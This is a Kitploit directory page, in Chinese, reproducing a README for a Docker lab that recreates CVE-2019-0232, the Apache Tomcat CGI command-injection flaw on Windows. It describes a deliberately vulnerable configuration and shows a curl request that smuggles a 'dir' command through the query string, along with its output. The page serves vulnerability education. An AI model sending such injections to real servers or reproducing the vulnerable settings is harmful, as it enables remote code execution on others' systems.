Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Preproduce-CVE-2019-0232 — 基于Docker的实验室环境,用于复现CVE-2019-0232,这是Windows上Apache Tomcat CGI Servlet中的远程代码执行漏洞,包含利用示例。 | Kitploit
工具/GitHubGitHub/luongchivi/preproduce-cve-2019-0232
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubluongchivi/preproduce-cve-2019-0232

Preproduce-CVE-2019-0232

基于Docker的实验室环境,用于复现CVE-2019-0232,这是Windows上Apache Tomcat CGI Servlet中的远程代码执行漏洞,包含利用示例。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
12个月前尚未审核
分享

CVE-2019-0232 - Apache Tomcat CGI Servlet 远程代码执行

本仓库提供了一个基于 Docker 的实验环境,用于在 Windows 上的 Apache Tomcat 9.0.17 中复现 CVE-2019-0232 漏洞。

漏洞概述

CVE-2019-0232 是 Apache Tomcat CGI Servlet 在 Windows 上运行时存在的一个远程代码执行漏洞。当 enableCmdLineArguments 参数设置为 true 时,由于对命令行参数的处理不当而引发该问题。攻击者可以通过查询字符串向 CGI 脚本传递任意参数,从而导致系统命令执行。

  • 受影响版本:Apache Tomcat 9.0.0.M1 至 9.0.17
  • 修复版本:9.0.18 及更高版本
  • 必要条件:
    • Windows 操作系统
    • CGI Servlet 配置中的 enableCmdLineArguments=true
    • 已启用 CGI Servlet 并映射到 URL 模式

实验环境

目录结构

root@kitploit:~
tomcat-cgi-lab
├── docker-compose.yml
├── Dockerfile
└── tomcat
	├── apache-tomcat-9.0.17-windows-x64.zip
    └── apache-tomcat-9.0.17
        ├── conf
        │   └── context.xml              ← (privileged="true")
        └── webapps
            └── ROOT
                └── WEB-INF
                    ├── web.xml           ← (CGI configuration)
                    └── cgi-bin
                        └── test.bat      ← (.bat script)

配置文件

  • context.xml:设置 privileged="true" 以允许 Web 应用程序使用 CGI Servlet。
  • web.xml:定义 CGI Servlet,设置 enableCmdLineArguments=true 并将其映射到 /cgi-bin/*。
  • test.bat:一个返回欢迎消息的简单批处理脚本。

快速开始

环境要求

  • Docker(Windows 容器模式)
  • Docker Compose

构建与运行

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

漏洞利用

root@kitploit:~
curl -i "http://localhost:8080/cgi-bin/test.bat?&dir"

Welcome to CGI Test Page
 Volume in drive C has no label.
 Volume Serial Number is 3E70-7C38

 Directory of C:\apache-tomcat-9.0.17\webapps\ROOT\WEB-INF\cgi-bin

07/12/2026  11:45 AM    <DIR>          .
07/12/2026  11:45 AM    <DIR>          ..
07/12/2026  12:25 PM                78 test.bat
               1 File(s)             78 bytes
               2 Dir(s)  136,027,971,584 bytes free
下载工具